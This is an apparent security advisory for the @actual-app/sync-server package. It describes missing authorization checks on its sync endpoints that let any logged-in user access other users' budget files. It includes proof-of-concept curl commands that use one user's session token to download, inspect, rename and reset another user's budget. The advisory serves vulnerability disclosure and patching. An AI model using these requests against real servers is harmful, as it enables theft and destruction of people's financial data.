GHSA-qmjj-p7m9-wjrv

Suggest an improvement
Source
https://github.com/advisories/GHSA-qmjj-p7m9-wjrv
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-qmjj-p7m9-wjrv/GHSA-qmjj-p7m9-wjrv.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-qmjj-p7m9-wjrv
Aliases
Published
2026-02-27T19:29:46Z
Modified
2026-02-28T05:49:30.982991Z
Severity
  • 5.7 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P CVSS Calculator
Summary
@actual-app/sync-server: Missing authorization in sync endpoints allows cross-user budget file access in multi-user mode
Details

In multi-user mode (OpenID), the sync API endpoints (/sync/*) don't verify that the authenticated user owns or has access to the file being operated on. Any authenticated user can read, modify, and overwrite any other user's budget files by providing their file ID.

Affected Code

File: packages/sync-server/src/app-sync.ts

The validateSessionMiddleware on line 31 confirms the user is authenticated, but individual endpoints only check that the file exists (via verifyFileExists), never that the requesting user owns or has access to the file.

Compare with POST /sync/delete-user-file (lines 394-430) which correctly checks:

const isOwner = file.owner === userId;
const isServerAdmin = isAdmin(userId);
if (!isOwner && !isServerAdmin) { ... }

This check is missing from all other endpoints.

Affected Endpoints

  • GET /sync/download-user-file - download any budget file
  • POST /sync/upload-user-file - overwrite any budget file
  • POST /sync/sync - read/write sync messages of any file
  • POST /sync/user-get-key - read encryption key info
  • POST /sync/user-create-key - change encryption key
  • POST /sync/reset-user-file - reset sync state
  • POST /sync/update-user-filename - rename file
  • GET /sync/get-user-file-info - read file metadata

PoC

Setup: Two users (Alice, Bob) authenticated via OpenID on the same Actual server. Alice has a budget with fileId abc-123.

Bob downloads Alice's budget:

curl -X GET 'https://actual.example.com/sync/download-user-file' \
  -H 'X-Actual-Token: <bob-session-token>' \
  -H 'X-Actual-File-Id: abc-123' \
  -o stolen-budget.blob

Bob reads Alice's file metadata:

curl -X GET 'https://actual.example.com/sync/get-user-file-info' \
  -H 'X-Actual-Token: <bob-session-token>' \
  -H 'X-Actual-File-Id: abc-123'

Bob renames Alice's budget:

curl -X POST 'https://actual.example.com/sync/update-user-filename' \
  -H 'X-Actual-Token: <bob-session-token>' \
  -H 'Content-Type: application/json' \
  -d '{"fileId": "abc-123", "name": "pwned"}'

Bob resets Alice's sync state (destructive):

curl -X POST 'https://actual.example.com/sync/reset-user-file' \
  -H 'X-Actual-Token: <bob-session-token>' \
  -H 'Content-Type: application/json' \
  -d '{"fileId": "abc-123"}'

File IDs can be discovered by admin users via GET /sync/list-user-files (admins see all files), through user_access sharing, or by guessing.

Impact

In multi-user deployments (OpenID mode), any authenticated user can steal other users' complete financial data (transactions, accounts, balances, payees), modify or destroy their budgets, and tamper with encryption keys. This is a personal finance app, so the data is highly sensitive.

Database specific 
{
    "nvd_published_at": "2026-02-26T23:16:34Z",
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-27T19:29:46Z",
    "cwe_ids": [
        "CWE-862"
    ]
}
References

Affected packages

npm / @actual-app/sync-server

Package

Name
@actual-app/sync-server
View open source insights on deps.dev
Purl
pkg:npm/%40actual-app/sync-server

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
26.2.1

Database specific

last_known_affected_version_range 
"<= 26.2.0"
source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-qmjj-p7m9-wjrv/GHSA-qmjj-p7m9-wjrv.json"